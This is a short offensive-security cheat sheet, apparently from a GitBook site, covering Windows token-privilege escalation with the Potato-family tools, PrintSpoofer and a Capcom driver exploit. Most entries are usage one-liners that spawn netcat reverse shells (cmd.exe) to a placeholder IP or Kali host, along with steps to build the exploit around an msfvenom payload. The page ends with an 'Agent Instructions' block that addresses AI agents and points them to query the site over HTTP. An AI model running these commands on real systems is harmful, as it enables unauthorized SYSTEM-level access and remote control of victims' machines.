# windows token exploits

## Churrasco

**REQUIREMENTS:**

* SeImpersonalPrivilege
* Windows XP/VISTA/2003/2008, Win Server 2003

```bash
# usage
> churrasco.exe -d "nc.exe -e cmd.exe IP PORT"
```

## HotPotato

* Windows 7,8,10, Server 2008, Server 2012

## [JuicyPotato](https://github.com/ohpe/juicy-potato)

**REQUIREMENTS:**

* SeImpersonatePrivilege
* machine is < Windows 10 1809 < Windows Server 2019
* CLSID: <http://ohpe.it/juicy-potato/CLSID/>
  * Can use <http://ohpe.it/juicy-potato/CLSID/GetCLSID.ps1>
* Try: `{03ca98d6-ff5d-49b8-abc6-03dd84127020}`

```bash
> JuicyPotato.exe -l 1337 -p "c:\windows\system32\cmd.exe" -a "/c PATH\nc.exe -e cmd.exe IP PORT" -t * -c CLSID
> Juicy.Potato.x86.exe -l 1337 -p "c:\users\public\kashz.exe" -t * -c CLSID

> PSExec64.exe -i -u "nt authority\local service" <shell.exe>
```

## [PrintSpoofer](https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0)

**REQUIREMENTS:**

* SeImpersonatePrivilege
* Win10, Server 2016, Server 2019

```bash
> PrintSpoofer.exe -i -c cmd.exe
> PrintSpoofer.exe -c "nc.exe IP PORT -e cmd.exe"
# -i : interactive
# -c : command to run
```

## [RoguePotato](https://github.com/antonioCoco/RoguePotato)

**REQUIREMENTS:**

* SeImpersonatePrivilege
* machine is >= Windows 10 1809 & Windows Server 2019

```bash
# socat redirector for OXID resolving, must use 135
$ socat tcp-listen:135,reuseaddr,fork tcp:KALI_IP:9999
> RoguePotato.exe -r KALI_IP -e "PATH\nc.exe IP PORT -e cmd.exe" -l 9999
```

## [SeLoadDriverPrivilege](https://book.hacktricks.xyz/windows/active-directory-methodology/privileged-accounts-and-token-privileges#capcom-sys-driver-exploit)

**REQUIREMENTS:**

* Visual Studio to compile

### Steps:

1. obtain user SID
   1. `Get-ADUser -Identity 'svc-print' | select SID`
   2. `(New-Object System.Security.Principal.NTAccount("svc-print")).Translate([System.Security.Principal.SecurityIdentifier]).value`
2. Clone Repo: [tandasat/ExploitCapcom/](https://github.com/tandasat/ExploitCapcom/)
3. Generate `.exe` msfvenom reverse shell
4. Update path to reverse shell on target line 410 in file `ExploitCapcom.cpp`
5. Set for RELEASE
6. Build Solution
7. run `.\ExploitCapcom.exe`

## SeBackupPrivilege

* <https://github.com/giuliano108/SeBackupPrivilege>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://kashz.gitbook.io/kashz-jewels/services/windows-token-exploits.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.